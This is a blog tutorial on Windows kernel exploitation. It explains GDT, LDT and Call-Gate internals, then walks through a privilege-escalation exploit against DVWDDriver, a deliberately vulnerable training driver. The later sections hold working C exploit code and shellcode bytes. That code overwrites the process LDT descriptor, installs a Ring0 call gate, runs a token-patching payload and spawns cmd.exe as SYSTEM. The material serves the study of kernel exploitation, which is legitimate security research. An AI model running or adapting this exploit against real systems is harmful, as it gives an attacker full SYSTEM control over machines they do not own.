Sunday, 17 July 2011

Windows Kernel Exploitation Basics - Part 3 : Arbitrary Memory Overwrite exploitation using LDT



In the previous post, we saw how to exploit the write-what-where vulnerability in DVWDDriver by overwriting a pointer in the kernel dispatch table HalDispatchTable. That technique relies on an undocumented syscall, so there is no guarantee that it will keep working in the same form after future system updates, as the great paper [1] points out. The technique detailed in this post is instead based on the hardware-specific structures GDT and LDT, which are more likely to stay the same across Windows versions. This method is also briefly presented in the book "A Guide to Kernel Exploitation". First of all, some background on the GDT and LDT is required, so let's grab our Intel Manual and have a look =)

1. Windows GDT and LDT

According to the Intel Manual [2], Segmentation is implemented using a Segment Selector, which is a 16-bit value. More precisely, a Logical Address is composed of:
  • An offset, which is a 32-bit value,
  • A Segment Selector, which is a 16-bit value.
Since a picture is worth a thousand words, here's a global overview of the Segmentation and Paging mechanisms (Logical address -> Linear address -> Physical address):



    The previous figure shows how the logical address is translated into a linear address by Segmentation. The Paging mechanism then comes into play: it translates the linear address into a physical address. Paging is an optional feature on Intel processors; when it is not used, linear address == physical address. Windows uses Paging, so the linear address is itself a structure split into 3 subfields, whose values are used as offsets into tables in order to get the physical address.
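To make the "3 subfields" concrete, here is a minimal sketch in C of how a 32-bit linear address can be split. It assumes classic non-PAE paging with 4 KB pages (a 10/10/12 bit split); a system booted with PAE uses a different layout. The type and function names are made up for this illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: 32-bit non-PAE paging with 4 KB pages. */
typedef struct {
    uint32_t directory; /* bits 31..22: index into the page directory */
    uint32_t table;     /* bits 21..12: index into the page table     */
    uint32_t offset;    /* bits 11..0 : byte offset inside the page   */
} linear_fields;

static linear_fields split_linear_address(uint32_t linear)
{
    linear_fields f;
    f.directory = (linear >> 22) & 0x3FFu;
    f.table     = (linear >> 12) & 0x3FFu;
    f.offset    = linear & 0xFFFu;
    /* Sanity check: the three fields must reassemble into the input. */
    assert(((f.directory << 22) | (f.table << 12) | f.offset) == linear);
    return f;
}
```

For instance, the address 0x80123456 splits into directory index 0x200, table index 0x123 and page offset 0x456.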

    Moreover, we can see that the Segment Selector references an entry in a table, and that this entry describes a segment (Segment Descriptor) in the linear address space: this table is the GDT. Ok, but how does it really work, and wtf is that LDT?! Let's go back to our Intel Manual... =)

    We learn that the GDT (Global Descriptor Table) and the LDT (Local Descriptor Table) are the two kinds of Segment Descriptor tables. We can also see this awesome figure:



    A GDT is mandatory: every system must create one when it starts up. There is a single GDT per processor for the entire system (that's why it's a "global" table), and it can be shared by all tasks on the system. Using an LDT is optional; it can be used by a single task or by a group of related tasks. An LDT is defined by a single GDT entry and is specific to a process, which means that this entry is replaced in the GDT during a process context switch.

    In more detail, the GDT normally contains:
    • A pair of kernel-mode code and data Segment Descriptors, with DPL = 0 (the DPL defines the privilege level of the segment being referenced, i.e. the ring)
    • A pair of user-mode code and data Segment Descriptors, with DPL = 3
    • One TSS (Task State Segment) descriptor, with DPL = 0. See [3]
    • 3 additional data segment entries
    • An optional LDT entry
    By default, a new process doesn't have an LDT; one is allocated only if the process requests it. If a process has an LDT, its descriptor can be found in the LdtDescriptor field of the _KPROCESS kernel structure of that process:

    kd> dt nt!_kprocess
       +0x000 Header           : _DISPATCHER_HEADER
       +0x010 ProfileListHead  : _LIST_ENTRY
       +0x018 DirectoryTableBase : [2] Uint4B
       +0x020 LdtDescriptor    : _KGDTENTRY
       +0x028 Int21Descriptor  : _KIDTENTRY
       [...]
    

    2. Call-Gate

    A Call-Gate gives access to code segments with different privilege levels:
    "Call-Gates facilitate controlled transfers of program control between different privilege levels. They are typically used only in operating systems or executives that use the privilege-level mechanism" (Intel Manual Vol. 3A & 3B [2], p. 201).

    A Call-Gate is one of the possible entries in the GDT or in an LDT. It is a special kind of descriptor called a Call-Gate Descriptor. It has the same size as a Segment Descriptor (8 bytes), but some fields are laid out differently. The figure below is taken from [1] and clearly shows the differences:



    In practice, a Call-Gate is used to jump to code located in a different segment and running with different privileges (ring). Here's what happens when we call a Call-Gate:
    1. The processor accesses the Call-Gate Descriptor,
    2. It locates the Code Segment Descriptor we ultimately want to reach, using the Segment Selector contained in the Call-Gate Descriptor,
    3. It retrieves the Base Address contained in the Code Segment Descriptor and adds to it the offset value contained in the Call-Gate Descriptor,
    4. The result is the linear address of the code we want to reach (Code linear address = Base Address + Offset).
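The four steps above can be sketched as a toy model in C. This is only an illustration of the address computation: the reduced descriptor types and the function name are hypothetical, and the sketch deliberately ignores the privilege checks and the table-indicator bit that a real processor also handles.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, reduced descriptors: only the fields used in steps 1-4. */
typedef struct { uint32_t base; } code_segment_desc;
typedef struct { uint16_t selector; uint32_t offset; } call_gate_desc;

/* Returns 1 and stores the target linear address, or returns 0 if the
 * gate's selector indexes past the end of the descriptor table. */
static int resolve_call_gate(const call_gate_desc *gate,
                             const code_segment_desc *table, size_t entries,
                             uint32_t *linear)
{
    assert(gate != NULL && table != NULL && linear != NULL);
    size_t index = (size_t)(gate->selector >> 3); /* drop TI and RPL bits */
    if (index >= entries)
        return 0;
    *linear = table[index].base + gate->offset;   /* Base Address + Offset */
    return 1;
}
```

With a flat code segment (base 0) at index 1, a gate holding selector 0x0008 and offset 0x00401000 resolves to the linear address 0x00401000, i.e. the offset itself.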

    The article [4] (in French) explains how to add a Call-Gate that lets us run code in Ring0 from Ring3. I won't repeat everything said in that great article, just what is useful for us right now:

    • The "Segment Selector" field must refer to the Segment Descriptor under which our payload will be executed. Because we want to run it with full privileges in Ring0, we'll refer to the Kernel Code Segment (CS) Descriptor. The right value is 0x0008.
    • The "DPL" field must be equal to 3 if we want to be able to access the Call-Gate from the userland.
    • The "Offset" field must be the address of the code we want to execute.
    • The "Type" field must be equal to 12 for Call-Gate Descriptor.
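As a rough illustration of the four fields listed above, the sketch below packs them into the raw 8-byte value of a 32-bit Call-Gate Descriptor, following the bit layout given in the Intel Manual. The function name is hypothetical, and the parameter count is simply left at 0.

```c
#include <assert.h>
#include <stdint.h>

/* Packs a 32-bit Call-Gate Descriptor into its raw 64-bit form.
 * Low dword : offset[15:0] | selector << 16
 * High dword: offset[31:16] | P (bit 15) | DPL (bits 14..13) | type (bits 11..8) */
static uint64_t make_call_gate32(uint32_t offset, uint16_t selector, unsigned dpl)
{
    assert(dpl <= 3u);
    uint32_t low  = (offset & 0x0000FFFFu) | ((uint32_t)selector << 16);
    uint32_t high = (offset & 0xFFFF0000u)
                  | (1u << 15)     /* Present                    */
                  | (dpl << 13)    /* DPL = 3 to allow userland  */
                  | (0xCu << 8);   /* Type 12: 32-bit Call-Gate  */
    return ((uint64_t)high << 32) | low;
}
```

For example, a gate to offset 0x00401000 through the kernel code selector 0x0008 with DPL 3 is encoded as 0x0040EC0000081000.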
    After that, we need to know how to call our Call-Gate...
    For that, we'll use the x86 FAR CALL instruction (opcode 0x9A). It differs from a classic CALL because we must specify an offset (32 bits) AND a Segment Selector (16 bits). In our case, only the Segment Selector matters and we can leave the offset at 0x00000000: when the selector designates a Call-Gate, the processor ignores the offset given in the FAR CALL and uses the one stored in the Call-Gate Descriptor. In other words, the call happens in two stages: the FAR CALL reaches the Call-Gate Descriptor, and the Call-Gate Descriptor in turn points to the code we want to execute. Here is how a Segment Selector is built, and the values we need:
    • Bits 0,1: we call the Call-Gate from userland, so we'll put the binary value 11 (3 in decimal, for Ring3) here;
    • Bit 2: we'll put the value 1 because our Call-Gate Descriptor goes into the LDT;
    • Bits 3..15: this is the index into the GDT/LDT (here, into the LDT). We'll put our Call-Gate at the first position in the LDT, so we'll put the value 0 here.
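Putting the three bit fields together gives the selector 0x0007. The following sketch (helper names are hypothetical) builds a selector from its fields and then lays out the 7 bytes of the corresponding FAR CALL instruction: the opcode 0x9A, the 32-bit offset, then the 16-bit selector, both little-endian.

```c
#include <assert.h>
#include <stdint.h>

/* Builds a 16-bit Segment Selector: index (13 bits), TI (1 bit), RPL (2 bits). */
static uint16_t make_selector(unsigned index, int in_ldt, unsigned rpl)
{
    assert(index < 8192u && rpl <= 3u);
    return (uint16_t)((index << 3) | ((in_ldt ? 1u : 0u) << 2) | rpl);
}

/* Writes the encoding of "call far selector:offset" into out[0..6]. */
static void encode_far_call(uint8_t out[7], uint32_t offset, uint16_t selector)
{
    out[0] = 0x9A;                            /* FAR CALL opcode         */
    out[1] = (uint8_t)(offset & 0xFFu);       /* offset, little-endian   */
    out[2] = (uint8_t)((offset >> 8) & 0xFFu);
    out[3] = (uint8_t)((offset >> 16) & 0xFFu);
    out[4] = (uint8_t)((offset >> 24) & 0xFFu);
    out[5] = (uint8_t)(selector & 0xFFu);     /* selector, little-endian */
    out[6] = (uint8_t)(selector >> 8);
}
```

Calling make_selector(0, 1, 3) yields 0x0007, and encoding a far call to 0007:00000000 produces the bytes 9A 00 00 00 00 07 00.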

    3. Methodology of exploitation

    Now that we've got the background about GDT and LDT we can move on to the exploitation...
    Basically, the exploitation consists in creating a new LDT and adding a single entry to it: a Call-Gate Descriptor whose fields are filled with the right values, as explained before...


    Then, we use the write-what-where vulnerability to overwrite the LDT descriptor in the GDT with a descriptor that corresponds to the fake LDT we previously created. Here:
    • what = LDT descriptor of the fake LDT,
    • where = location of the LDT descriptor. The LDT is represented by a _KGDTENTRY structure called LdtDescriptor, which is a field of the _KPROCESS structure (the structure used by the kernel to store information about a specific process), as we've seen before. So, we get the address to write to by retrieving the address of _KPROCESS (== address of _EPROCESS) and adding the right offset (0x20 for Windows Server 2003 SP2).
    Finally, we call our Call-Gate by making a FAR CALL through the first (and only) entry in the LDT of the current process. This jumps to our shellcode.
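The "what" of the overwrite is an 8-byte LDT descriptor. As a minimal sketch, assuming the standard Intel system-descriptor layout and using a hypothetical function name, it can be packed like this (Type = 2 marks an LDT, and only the low 16 bits of the limit are filled in, as the exploit does):

```c
#include <assert.h>
#include <stdint.h>

/* Packs an LDT system descriptor into its raw 64-bit form.
 * Low dword : limit[15:0] | base[15:0] << 16
 * High dword: base[23:16] | type (bits 11..8) | P (bit 15) | base[31:24] << 24 */
static uint64_t make_ldt_descriptor32(uint32_t base, uint32_t limit)
{
    assert(limit <= 0xFFFFu);              /* sketch only handles limit[15:0] */
    uint32_t low  = limit | ((base & 0x0000FFFFu) << 16);
    uint32_t high = ((base >> 16) & 0xFFu) /* BaseMid                */
                  | (0x2u << 8)            /* Type 2: LDT            */
                  | (1u << 15)             /* Present                */
                  | (base & 0xFF000000u);  /* BaseHi                 */
    return ((uint64_t)high << 32) | low;
}
```

For a fake LDT located at the made-up address 0x12345678 with limit 0xFFFF, the descriptor value is 0x120082345678FFFF. The "where" is then simply the _KPROCESS address plus 0x20.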

    4. Shellcoding

    Okay, we've briefly seen how the exploitation works. We will reuse the shellcode from the previous article about exploiting write-what-where vulnerabilities with HalDispatchTable. But there is an additional problem here... we need to be able to return from the Call-Gate after our payload has run. A FAR CALL is made to jump through the Call-Gate, which means the code segment changes, so we need to finish with a FAR RET (0xCB) and not a simple RET. By doing so, execution resumes at the next instruction of our exploit program.

    Moreover, it's important to remember that the FS segment register points to the KPCR structure (Kernel Processor Control Region) in kernel mode, but in user mode it points to the TEB structure (Thread Environment Block). Indeed:
    • In Kernel-Mode, FS=0x30
    • In User-Mode, FS=0x3B
    Therefore, we have to correctly set FS to the value 0x30 before executing our shellcode in kernelland, and then we must put its value back to 0x3B before returning.
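These two FS values are ordinary Segment Selectors, so they can be decoded with the same bit layout seen earlier. The small sketch below (hypothetical type and function names) shows that they select two different GDT entries with different privilege levels:

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    unsigned index;  /* bits 15..3: index into the descriptor table */
    unsigned in_ldt; /* bit 2     : 0 = GDT, 1 = LDT                */
    unsigned rpl;    /* bits 1..0 : Requested Privilege Level       */
} selector_fields;

static selector_fields decode_selector(uint16_t selector)
{
    selector_fields f;
    f.index  = (unsigned)selector >> 3;
    f.in_ldt = ((unsigned)selector >> 2) & 1u;
    f.rpl    = (unsigned)selector & 3u;
    /* Sanity check: the fields must reassemble into the input. */
    assert(((f.index << 3) | (f.in_ldt << 2) | f.rpl) == (unsigned)selector);
    return f;
}
```

Decoding 0x30 gives GDT index 6 with RPL 0, while 0x3B gives GDT index 7 with RPL 3.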

    It is for these two reasons that the authors of DVWDExploit wrote a wrapper (ReturnFromGate) in assembly that performs those operations. The address of this wrapper is what must be put into the Offset field of the Call-Gate Descriptor.
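The wrapper is a fixed byte template whose 4-byte placeholder (0x41414141, at offset 18) is replaced with the payload address before use. Here is a portable sketch of that fix-up step only; the byte sequence is the one from DVWDExploit, while the function name, the buffer handling and the example address are assumptions made for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define OFFSET_SHELLCODE 18 /* position of the imm32 of "mov eax, imm32" */

static const uint8_t wrapper_template[] = {
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, /* nop x8           */
    0x60,                                           /* pushad           */
    0x0F, 0xA0,                                     /* push fs          */
    0x66, 0xB8, 0x30, 0x00,                         /* mov ax, 30h      */
    0x8E, 0xE0,                                     /* mov fs, ax       */
    0xB8, 0x41, 0x41, 0x41, 0x41,                   /* mov eax, payload */
    0xFF, 0xD0,                                     /* call eax         */
    0x0F, 0xA1,                                     /* pop fs           */
    0x61,                                           /* popad            */
    0xCB                                            /* retf             */
};

/* Copies the template into dst and patches in the payload address.
 * Returns the number of bytes written, or 0 if dst is too small. */
static size_t build_wrapper(uint8_t *dst, size_t dst_size, uint32_t payload)
{
    assert(dst != NULL);
    if (dst_size < sizeof wrapper_template)
        return 0;
    memcpy(dst, wrapper_template, sizeof wrapper_template);
    for (int i = 0; i < 4; i++) /* little-endian store */
        dst[OFFSET_SHELLCODE + i] = (uint8_t)((payload >> (8 * i)) & 0xFFu);
    return sizeof wrapper_template;
}
```

The template is 28 bytes long; patching it with the made-up address 0x00401000 turns bytes 18..21 into 00 10 40 00 and leaves the rest untouched.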

    5. Exploitation in details

    Okay, we've got all the elements to fully understand the exploit. Here is how it works:
    1. Retrieve the address of the payload that will be executed in kernel mode (named KernelPayload), that is, the code that patches the current process's Access Token.
    2. Retrieve the address of the _KPROCESS structure.
    3. Retrieve the address of the LDT descriptor (the LdtDescriptor field), located at address of _KPROCESS + offset (0x20).
    4. Create a new LDT using the ZwSetInformationProcess() syscall exported by ntdll.dll. This is done in the function called SetLDTEnv().
    5. Put the address of KernelPayload into the wrapper ReturnFromGate so that the shellcode can be called from it. Then, copy this wrapper into executable memory.
    6. Build the Call-Gate Descriptor in the function called PrepareCallGate32(). We've already seen how to fill the fields of the Call-Gate in order to run code in Ring0 from Ring3.
    7. Build the LDT Descriptor that corresponds to the previously created LDT. This is done by the function called PrepareLDTDescriptor32().
    8. Use the vulnerability to overwrite the LDT descriptor with the one corresponding to the fake LDT that has been previously created:
      • Store the new LDT descriptor into the GlobalOverwriteStruct thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_STORE.
      • Write this new LDT descriptor, contained in GlobalOverwriteStruct, at the location of the existing LDT descriptor, thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_OVERWRITE.
    9. Force a process context switch. Indeed, the LDT Segment Descriptor in the GDT is updated only after a context switch. To do so, we just sleep for some time.
    10. Finally, make the FAR CALL to the Call-Gate. That triggers the execution of the wrapper and then of our shellcode in kernel mode.
    11. When we return from our shellcode, the process is running with Owner SID = NT AUTHORITY\SYSTEM, so we can do whatever we want!
    A figure might help to understand... =) 




    6. Exploit code

    Here is a code snippet from DVWDExploit with many comments I've added. The full code is available in the archive:

    // ----------------------------------------------------------------------------
    // Arbitrary Memory Overwrite exploitation ------------------------------------
    // ---- Method using LDT  -----------------------------------------------------
    // ----------------------------------------------------------------------------
    
    
    typedef NTSTATUS (WINAPI *_ZwSetInformationProcess)(HANDLE ProcessHandle, 
                           PROCESS_INFORMATION_CLASS ProcessInformationClass,  
                           PPROCESS_LDT_INFORMATION ProcessInformation,
                           ULONG ProcessInformationLength);    
    
    // Fill the Call-Gate Descriptor -------------------------------------------------
    VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload) {
    
     ULONG_PTR IPayload = (ULONG_PTR)Payload;
    
     RtlZeroMemory(pGate, sizeof(CALL_GATE32));
     
     pGate->Fields.OffsetHigh   = (IPayload & 0xFFFF0000) >> 16;
     pGate->Fields.OffsetLow    = (IPayload & 0x0000FFFF);
     pGate->Fields.Type     = 12;   // Gate Descriptor
     pGate->Fields.Param    = 0;
     pGate->Fields.Present    = 1;
     pGate->Fields.SegmentSelector  = 1 << 3;  // Kernel Code Segment Selector
     pGate->Fields.Dpl     = 3;
    }
    
    // Setup the LDT descriptor ------------------------------------------------------
    VOID PrepareLDTDescriptor32(PLDT_ENTRY pLDTDesc, PVOID LDTBasePtr) {
    
     ULONG_PTR LDTBase = (ULONG_PTR)LDTBasePtr;
    
     RtlZeroMemory(pLDTDesc, sizeof(LDT_ENTRY));
     
     pLDTDesc->BaseLow     = LDTBase & 0x0000FFFF;
     pLDTDesc->LimitLow     = 0xFFFF;
     pLDTDesc->HighWord.Bits.BaseHi  = (LDTBase & 0xFF000000) >> 24;
     pLDTDesc->HighWord.Bits.BaseMid = (LDTBase & 0x00FF0000) >> 16;
     pLDTDesc->HighWord.Bits.Type = 2;
     pLDTDesc->HighWord.Bits.Pres  = 1;
    }
    
    
    // Assembly wrapper to the payload to be able to return from the Call-Gate ------
    // (using a FAR RET)
    #define OFFSET_SHELLCODE 18
    CHAR ReturnFromGate[]="\x90\x90\x90\x90\x90\x90\x90\x90"
           "\x60"                  // pushad       save general purpose registers
           "\x0F\xA0"              // push  fs     save FS segment register
           "\x66\xB8\x30\x00"      // mov  ax, 30h   
           // FS value is different between userland (0x3B) and kernelland (0x30)
           "\x8E\xE0"              // mov  fs, ax     
           "\xB8\x41\x41\x41\x41"  // mov  eax, @Shellcode  invoke the payload
           "\xFF\xD0"              // call  eax  
           "\x0F\xA1"              // pop   fs     restore FS segment register
           "\x61"                  // popad        restore general purpose registers
           "\xcb";                 // retf       far ret
    
           
    // Assembly code that executes a CALL to 0007:00000000 ----------------------------
    // (Segment selector: 0x0007, offset address: 0x00000000)
    // 16-bit segment selector:
    // [ 13-bit index into GDT/LDT ][0=descriptor in GDT/1=descriptor in LDT]
    // [Requested Privilege Level: 00=ring0/11=ring3]
    // => 0007 means: index 0 into LDT (first entry), descriptor in LDT, ring3
    VOID FarCall() {
     __asm { 
       _emit 0x9A
       _emit 0x00
       _emit 0x00
       _emit 0x00
       _emit 0x00
       _emit 0x07
       _emit 0x00
     }
    }
    
    // Use the vulnerability to overwrite the LDT Descriptor into GDT ------------------
    BOOL OverwriteGDTEntry(ULONG64 LDTDesc, PVOID *KGDTEntry) {
    
     HANDLE hFile;
     ARBITRARY_OVERWRITE_STRUCT overwrite;
     ULONG64 storage = LDTDesc;
     BOOL ret;
     DWORD dwReturn;
    
     hFile = CreateFile(L"\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
    
     if(hFile != INVALID_HANDLE_VALUE) {
      overwrite.Size = 8;
      overwrite.StorePtr = (PVOID)&storage;
      ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
    
      overwrite.Size = 8;
      overwrite.StorePtr = (PVOID)KGDTEntry;
      ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
    
      CloseHandle(hFile);
    
      return TRUE;
     }
    
     return FALSE;
    }
    
    
    // Create a new LDT using ZwSetInformationProcess ----------------------------------
    BOOL SetLDTEnv(VOID) {
    
     NTSTATUS retStatus;
     LDT_ENTRY eLdt;
     PROCESS_LDT_INFORMATION infoLdt; 
     _ZwSetInformationProcess ZwSetInformationProcess;
    
     // Retrieve the address of the undocumented syscall ZwSetInformationProcess()
     ZwSetInformationProcess = (_ZwSetInformationProcess)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwSetInformationProcess");
    
     if(!ZwSetInformationProcess)
      return FALSE;
    
     // Create and initialize a new LDT
     RtlZeroMemory(&eLdt, sizeof(LDT_ENTRY));
    
     RtlCopyMemory(&(infoLdt.LdtEntries[0]), &eLdt, sizeof(LDT_ENTRY));
     infoLdt.Start = 0;
     infoLdt.Length = sizeof(LDT_ENTRY);
    
     retStatus = ZwSetInformationProcess(GetCurrentProcess(), 
                 ProcessLdtInformation, 
                 &infoLdt, 
                 sizeof(PROCESS_LDT_INFORMATION));
    
     if(retStatus != STATUS_SUCCESS)
      return FALSE;
    
     return TRUE;
    }
    
    
    #define LDT_DESC_FROM_KPROCESS 0x20
    ULONG64 LDTDescStorage32=0;
    
    // Main function -------------------------------------------------------------------
    BOOL LDTDescOverwrite32(VOID) {
    
     PVOID kprocess,kprocessLDTDesc;
     PLDT_ENTRY pLDTDesc = (PLDT_ENTRY)&LDTDescStorage32;
     PVOID ReturnFromGateArea = NULL;
     PCALL_GATE32 pGate = NULL;
    
     // User standard SIDList Patch
     FARPROC KernelPayload = (FARPROC)UserShellcodeSIDListPatchCallGate;
    
     // Retrieve the KPROCESS Address == EPROCESS Address
     kprocess = FindCurrentEPROCESS();
     if(!kprocess)
      return FALSE;
    
     // Address of LDT Descriptor
     // kd> dt nt!_kprocess
     kprocessLDTDesc = (PBYTE)kprocess + LDT_DESC_FROM_KPROCESS;
     printf("[--] kprocessLDTDesc found at: %p\n", kprocessLDTDesc);
    
     // Create a new LDT entry
     if(!SetLDTEnv())
      return FALSE;
    
     // Fixup the Gate Payload (replace 0x41414141 by the address of the kernel payload)
     // and put it into executable memory
     RtlCopyMemory(ReturnFromGate + OFFSET_SHELLCODE, &KernelPayload, sizeof(FARPROC));
     ReturnFromGateArea = CreateUspaceExecMapping(1);
     RtlCopyMemory(ReturnFromGateArea, ReturnFromGate, sizeof(ReturnFromGate));
    
     // Build the Call-Gate(system descriptor), we pass the address of the shellcode
     pGate = CreateUspaceMapping(1);
     PrepareCallGate32(pGate, (PVOID)ReturnFromGateArea);
    
     // Build the fake LDT Descriptor with a Call-Gate (the one previously created) 
     PrepareLDTDescriptor32(pLDTDesc, (PVOID)pGate);
    
     printf("[--] LDT Descriptor fake: 0x%llx\n", LDTDescStorage32);
    
     // Trigger the vulnerability: overwrite the LdtDescriptor field in KPROCESS
     OverwriteGDTEntry(LDTDescStorage32, kprocessLDTDesc);
     
     // We force a process context switch
     // Indeed, the LDT segment descriptor into the GDT is updated only after a context 
     // switch. So, it's needed before being able to use the Call-Gate
     Sleep(1000);
    
     // Trigger the call gate via a FAR CALL (see assembly code)
     FarCall();
    
     return TRUE;
    }
    
    
    // This is where we begin ... ------------------------------------------------
    BOOL TriggerOverwrite32_LDTRemappingWay() {
     
     // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
     if(LoadAndGetKernelBase() == FALSE)
      return FALSE;
    
     // We exploit the vulnerability with a payload that patches the SID list to get 
     // SYSTEM privilege and then we spawn a shell if it succeeds
     if(LDTDescOverwrite32() == TRUE) {
      if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
       wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
       return FALSE;
      }
     }
     
     return TRUE;
    }
    


    7. w00t ?


    The exploit is working well as we can see:

    w00t again !!


    References

    [1] GDT and LDT in Windows kernel vulnerability exploitation, by Matthew "j00ru" Jurczyk & Gynvael Coldwind, Hispasec (16 January 2010)

    [2] Intel Manual Vol. 3A & 3B
    http://www.intel.com/products/processor/manuals/

    [3]
    Task State Segment (TSS)